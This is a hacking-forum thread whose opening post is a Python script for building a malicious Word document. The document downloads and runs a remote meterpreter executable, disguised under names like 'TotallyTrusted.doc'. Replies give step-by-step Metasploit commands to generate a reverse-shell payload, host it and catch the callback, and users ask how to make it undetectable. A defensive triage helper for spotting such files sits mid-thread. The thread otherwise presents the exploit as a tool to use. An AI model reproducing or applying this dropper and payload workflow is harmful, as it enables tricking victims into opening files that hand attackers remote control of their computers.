M2G Posted February 23, 2013

```python
#!/usr/bin/python
# Exploit Title: MS Office 2010 Download Execute
# Google Dork: NA
# Date: 19 Feb 2013
# Exploit Author: g11tch
# Vendor Homepage:
# Software Link:
# Version: ALL
# Tested on: [Windows XP SP1, SP2, Windows 7 ]
# CVE :
###########
# Just generate a meterpreter .exe, then provide the link to it via the exploit,
# it will automagically download and run said .exe
#
# Python 2 script (print statements, raw_input, str.decode('base64')).
import binascii
import sys
import time

print "Microsoft Office 2010, download -N- execute "
print " What do you want to name your .doc ? "
print " Example: TotallyTrusted.doc "
filename = raw_input()
print " What is the link to your .exe ? "
print "HINT!!:: Feed me a url. ie: http://super/eleet/payload.exe "
url = raw_input()
print "Gears and Cranks working mag1c in the background "
time.sleep(3)

# Closing braces appended after the URL.
close = "{}}}}}"
# The download URL is written into the document as a run of hex digits.
binme = binascii.b2a_hex(url)
# Base64-encoded document prefix; the blob itself is not reproduced in this copy of the post.
file = ('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\n')

# Output file = decoded prefix + hex(url) + closing braces, written under the chosen name.
textfile = open(filename, 'w')
textfile.write(file.decode('base64') + binme + close)
textfile.close()
time.sleep(3)
print "enjoy"
```
XgaMeR Posted May 27, 2013 Can someone explain to me in more detail how I should use it?
neox Posted May 27, 2013 (edited) Can someone explain to me in more detail how I should use it?

1. Create payload.exe locally with metasploit: msfpayload windows/shell/reverse_tcp LHOST=192.168.206.129 R | msfencode -e x86/shikata_ga_nai -c 4 -t exe -o /root/Desktop/payload.exe, or use a trojan server.exe
2. Upload the server.exe to a free online hosting
3. Use the python exploit
4. If you used a trojan server, you call it back with that trojan
5. With metasploit: msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.206.129 E

The problem is that the guy who made the exploit did not create the header of the .doc format file correctly, so that it looks as much as possible like a real document.doc. And if you have a good imagination you can combine it with several other possibilities. Edited May 27, 2013 by neox
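As an added example (not code from the thread or from g11tch's script), here is a small Python 3 triage helper that checks the two things discussed above: neox's point that the generated file does not carry a real .doc header, and the fact that the original script hides the download URL as a plain hex string. It sniffs the format from the leading bytes (OLE compound file for legacy .doc, ZIP for .docx, `{\rtf` for RTF), flags a mismatch with the extension, and decodes long hex runs to recover the URL as an indicator. Because the base64 prefix is missing from this copy of the post, the sample document built here uses a minimal RTF header as a constructed stand-in; that the real prefix is RTF is an assumption suggested only by the closing braces the script appends.

```python
import binascii
import re

# File-signature constants (standard magic numbers, not assumptions).
OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"  # legacy binary .doc: OLE compound file
ZIP_MAGIC = b"PK\x03\x04"                        # .docx: OOXML is a ZIP container
RTF_MAGIC = b"{\\rtf"                            # RTF, which Word opens whatever the extension says


def sniff_format(data):
    """Classify a document by its leading bytes, ignoring the file extension."""
    if data.startswith(OLE_MAGIC):
        return "ole-doc"
    if data.startswith(ZIP_MAGIC):
        return "ooxml"
    if data.lstrip().startswith(RTF_MAGIC):
        return "rtf"
    return "unknown"


# A run of at least 16 hex digits (8 bytes); the dropper emits the whole URL as one such run.
HEX_RUN = re.compile(rb"[0-9a-fA-F]{16,}")
URL_RE = re.compile(rb"https?://[\x21-\x7e]+")


def find_hex_urls(data):
    """Decode every long hex run (at both byte alignments) and return any URLs found inside."""
    found = []
    for m in HEX_RUN.finditer(data):
        run = m.group(0)
        for offset in (0, 1):                    # a stray leading hex digit would shift the alignment
            chunk = run[offset:]
            chunk = chunk[: len(chunk) & ~1]     # unhexlify needs an even number of digits
            if not chunk:
                continue
            decoded = binascii.unhexlify(chunk)
            for url in URL_RE.findall(decoded):
                text = url.decode("ascii")
                if text not in found:
                    found.append(text)
    return found


def triage(name, data):
    """Report the sniffed format, whether it contradicts the extension, and any hex-hidden URLs."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    expected = {"doc": "ole-doc", "docx": "ooxml", "rtf": "rtf"}.get(ext)
    fmt = sniff_format(data)
    return {
        "format": fmt,
        "extension_mismatch": expected is not None and fmt != expected,
        "hex_urls": find_hex_urls(data),
    }


# Constructed sample: mimics what the poster's script writes (prefix + hex(url) + "{}}}}}").
# The real prefix is the base64 blob missing from this copy; this minimal RTF header is a stand-in.
CONSTRUCTED_PREFIX = b"{\\rtf1\\ansi\n"


def build_sample_dropper(url, prefix=CONSTRUCTED_PREFIX):
    """Build a document the way the original script does, with a hex-encoded URL in the body."""
    return prefix + binascii.hexlify(url.encode("ascii")) + b"{}}}}}"


if __name__ == "__main__":
    sample = build_sample_dropper("http://super/eleet/payload.exe")
    print(triage("TotallyTrusted.doc", sample))
```

To run it over a real suspicious attachment, call `triage(path, open(path, "rb").read())`; a `.doc` whose sniffed format is `rtf` or `unknown` together with a decoded `http://` URL is exactly the artifact this script produces.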
hostbob Posted January 21, 2014 can you write a tut on how to re-fud this?
Hir0sh1 Posted September 10, 2014 I have tried that exploit along with many others and on my side they don't work. The only way to exploit a .doc these days is if the person enables and runs macros.
dw8os Posted September 13, 2014 hmm, metasploit allows concatenating a .doc and an .exe
Hir0sh1 Posted September 13, 2014 Yes, metasploit will create a .doc or a .pdf file. I was referring to the script posted in the original post. There is a 0day for both .doc and .pdf that executes with no warnings, used by FinFisher (Gamma Group), but it's not public yet.
scarcium Posted October 7, 2014 1. Create payload.exe locally with metasploit: msfpayload windows/shell/reverse_tcp LHOST=192.168.206.129 R | msfencode -e x86/shikata_ga_nai -c 4 -t exe -o /root/Desktop/payload.exe, or use a trojan server.exe
2. Upload the server.exe to a free online hosting
3. Use the python exploit
4. If you used a trojan server, you call it back with that trojan
5. With metasploit: msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.206.129 E

The problem is that the guy who made the exploit did not create the header of the .doc format file correctly, so that it looks as much as possible like a real document.doc. And if you have a good imagination you can combine it with several other possibilities.

If we change the header, would it work?